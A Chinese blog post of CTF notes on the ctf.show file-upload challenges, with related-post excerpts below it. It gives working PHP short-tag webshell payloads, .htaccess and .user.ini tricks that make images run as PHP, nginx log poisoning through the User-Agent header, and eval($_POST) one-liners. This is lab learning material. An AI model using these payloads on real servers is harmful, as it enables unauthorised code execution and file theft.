ctf_show笔记篇(web入门---文件上传)

已于 2024-03-18 09:19:43 修改
阅读量815 收藏 8
点赞数 8
分类专栏: ctf.show web题 文章标签: ctf php 笔记
于 2024-03-06 10:36:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whale_waves/article/details/136419392
版权

目录

文件上传

151:简单的前端验证,有多种绕过方法

152:简单后端验证,不知道过滤了那些后缀,我尝试以后都可以上传

153:利用.user.ini文件,虽然能上传.pht这一类文件但访问时只会下载下来

154-155:这一题似乎对文件内容进行了验过滤,不允许出现php

156:过滤了[],但是[]可以使用{}替代

157-158:到现在已知过滤了'{}','[]','php',';'

159:禁用了括号,system这些就用不了,利用``来执行命令,或者使用文件包含来利用日志文件输入指令

160:过滤了空格以及``以及log,使用文件包含和连接号 .  来利用日志文件输入指令

161:和160一样

####这几道题在有做讲解文件上传{session文件包含以及条件竞争、图片文件渲染绕过(gif、png、jpg)}-CSDN博客

162-163:session文件包含以及条件竞争

164:png图片渲染

165:jpg图片渲染

166:只允许上传压缩文件,直接上传压缩文件在

167:利用.htaccess文件

168:可用段标签直接绕过

169-170:利用.user.ini包含日志文件执行命令

文件上传

151:简单的前端验证,有多种绕过方法

152:简单后端验证,不知道过滤了那些后缀,我尝试以后都可以上传

153:利用.user.ini文件,虽然能上传.pht这一类文件但访问时只会下载下来

这里就关系到了网站中间件的设置问题

这里利用.user.ini文件,只要访问同目录下的php文件就能把目标png文件当作php文件加载

154-155:这一题似乎对文件内容进行了验过滤,不允许出现php

自行搜索绕过一下其他的和153题无异

156:过滤了[],但是[]可以使用{}替代

157-158:到现在已知过滤了'{}','[]','php',';'

可以直接写payload获得flag,不用在继续$_POST之类的

GIF89a
<?= eval(system('cat ../flag.p*'))?>

159:禁用了括号,system这些就用不了,利用``来执行命令,或者使用文件包含来利用日志文件输入指令

160:过滤了空格以及``以及log,使用文件包含和连接号 .  来利用日志文件输入指令

payload:

user-agent: <?php eval(system('cat flag.php'));?>

<?=include"/var/lo"."g/nginx/l"."og"?>

161:和160一样

但是会验证图片头信息

使用GIF89a在文件最上方添加

####这几道题在有做讲解文件上传{session文件包含以及条件竞争、图片文件渲染绕过(gif、png、jpg)}-CSDN博客

162-163:session文件包含以及条件竞争

164:png图片渲染

165:jpg图片渲染

166:只允许上传压缩文件,直接上传压缩文件在

上传后可以下载可能存在文件包含

随便创建一个zip文件上传抓包

点击下载文件抓包

执行命令

167:利用.htaccess文件

.htaccess一般只限定在使用appach的时候会有用

使用.htaccess文件要开启apache httpd.config AllowOverride All

.htaccess内容:

AddType application/x-httpd-php .jpg

168:可用段标签直接绕过

payload:<?=`ls ../`?>

前端过滤白名单只允许png文件,抓包以后可修改为php文件

169-170:利用.user.ini包含日志文件执行命令

.user.ini上传的目录下必须有php文件

前端限制zip文件,后端限制png文件,但是对后缀没有过滤

这样就算成功

怪兽不会rap_哥哥我会crash
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFshow 文件上传 web162
Kradress的博客
02-15 2049
目录思路总结 思路 大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89a auto_prepend_file=png png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%
ctf_walkthrough:捕获标志-演练
02-15
夺旗-演练在“捕获标志”(CTF)中,“标志”是隐藏在有目的漏洞的程序或网站中的秘密。 参赛者从其他参赛者(进攻/防守风格的CTF)或组织者那里窃取旗帜。 存在几种变体,包括在硬件设备中隐藏标志。 安全CTF通常被...
ctfshow-web入门 文件上传部分题解
volcano的博客
03-06 6524
ctfshow文件上传web151-152web153(.user.ini绕过).user.iniweb154-155(短标签绕过+.user.ini绕过)短标签绕过web156web157-159web160(日志包含绕过)web161web162-163(session文件包含+条件竞争)条件竞争web164(png图片二次渲染绕过)web165(jpg图片二次渲染绕过)web166web167(.htaccess) 文件上传 web151-152 这两题步骤是一样的,先写一个一句话: <?ph
2024年最新ctfshow WEB入门 文件上传151-170_ctfshow web入门文件包含167
最新发布
2401_84302583的博客
05-01 378
该方法应该只有在LINUX有用。
CTFshow web入门——文件上传
热门推荐
小元砸的博客
03-14 1万+
Web 151
CTFshow——文件上传
D.MIND 的博客
02-23 1284
目录:web151、152——前后端的简单检验web153——.user.ini配置文件web154、155——PHP的其他标记写法web156——{ }代替[ ]web157、158、159——web160—— web151、152——前后端的简单检验 发现只能上传PNG文件,上传一个图片马,用Burp抓包修改文件后缀  1.在upload/xx.php页面结合一句话木马  2.用蚁剑、菜刀连接 web153——.user.ini配置文件 细看:.htaccess和.user.ini配置文件妙用 如
CTF入门到提升(十)文件上传_ctf实战从入门到提升 pdf
2401_83947353的博客
04-28 298
像多层压缩包嵌套、或者本身有缺陷产生的文件上传问题等等后面都会分享,本次内容为配合Apache的解析缺陷。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?5、LVS、Nginx、HAproxy有什么区别?15、讲述一下LVS三种模式的工作过程?
可编程控制器_S7-1500_S7-1500编程入门_
10-01
S7-1500新手入门文档,包含组态、编程、选型,调试的一些经验分享
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
i春秋-ctf 文件上传
AAAAAAAAAAAA66的博客
11-08 6686
文章目录 前言 一、题目 二、解题步骤 1.我的错误思路 2.正确解题姿势 总结 前言 CTF小白,这道题思考了很久,i春秋上现在也没write up,卡了1天了,后面在buuctf找到了题解答。通过这一天让我对文件上传有了更深的理解。 目录 文章目录 一、题目进入环境。 二、解题步骤 1.我的错误思路 2.​​​​​​正确解题姿势 总结 一道普通的文件上传题,通过一天的思考我得到这类题目的思路总结。 提示:以下是本文章正文内容,下
ctfshow-文件包含&文件上传(详解)
qq_50589021的博客
07-20 3801
文件包含 web78-79 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?> 伪协议: ?file=php://filter/read=convert.base64-encode/resource=flag.php ?file=data://text/plain;base64,PD9waHAgc3lzd
ctf 文件上传总结
njqfb的博客
06-04 3250
前端绕过 正常上传文件,捉取数据包修改 后端绕过 服务器端检测的绕过 windows特性 windows对文件名自动去掉点 空格 ::$DATA(这个是ntfs的特性) 利用这个特性绕过黑名单限制 函数特性 move_uploaded_file函数会自动去除文件名末尾的点 和 /. fopen函数特性 <?php $filename='1.php/.'; $content="<?php eval($_POST[1]);?>"; $f = fopen($filename, 'w');
CTFshow——web入门——文件上传
h_adam的博客
02-17 4974
web151 前端校验 修改上传格式为php,上传一句话马,蚁剑连接得flag web152 后端校验 上传一句话,png文件抓包 修改文件名后缀为php,访问被解析,蚁剑连接得flag。 web153 打开发现/upload下存在index.php文件,我们可以利用.user.ini,可参阅.htaccess 和.user.ini 配置文件妙用 php手册—关于php.ini配置项 前端把后缀限制去掉,accept改为file,上传user.ini Content-Type修改为image/png
CTF条件竞争
夏日 の blog
02-10 2572
简介 条件竞争是指一个系统的运行结果依赖于不受控制的事件的先后顺序。当这些不受控制的事件并没有按照开发者想要的方式运行时,就可能会出现 bug。尤其在当前我们的系统中大量对资源进行共享,如果处理不当的话,就会产生条件竞争漏洞。 个人理解 通俗的来讲就是假设程序同时处理存钱和取钱,当取钱"速度"大于存钱时,可能就会出现取钱后程序还未来得及将金额减少,程序又立马处理存钱,由此产生非预期的结果。 竞争...
CTF学习笔记22:iwebsec-文件上传漏洞-07-条件竞争文件上传
lifeng_dc的博客
03-18 5866
一、正常上传php文件被删除 你这么暴力,刚上传就删除,解决思路就是不停地上传,你要接收文件、判断文件、删除文件总要时间吧; 那我见缝插针,不停地调用上传的文件,一旦成功就写入另一ma,也就是ma中ma,试一下吧,要用两个burpsuite(双开,哈哈) 二、Attack步骤 (一)准备父上传文件1.php并上传 <?php $f=fopen("7.php","w"); fputs($f,'<?php @eval($_POST[cmd]);?>');?> 该语句在测试过程中卡了很
WebCTFSHOW 文件上传刷题记录(全)
uuzeray的博客
01-16 1671
期末考完终于可以好好学ctf了,先把这些该回顾的回顾完,直接rushjava!
CTFshow(文件上传
Heathclyf的博客
01-23 1633
One Last Kiss
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过来绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怪兽不会rap_哥哥我会crash

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值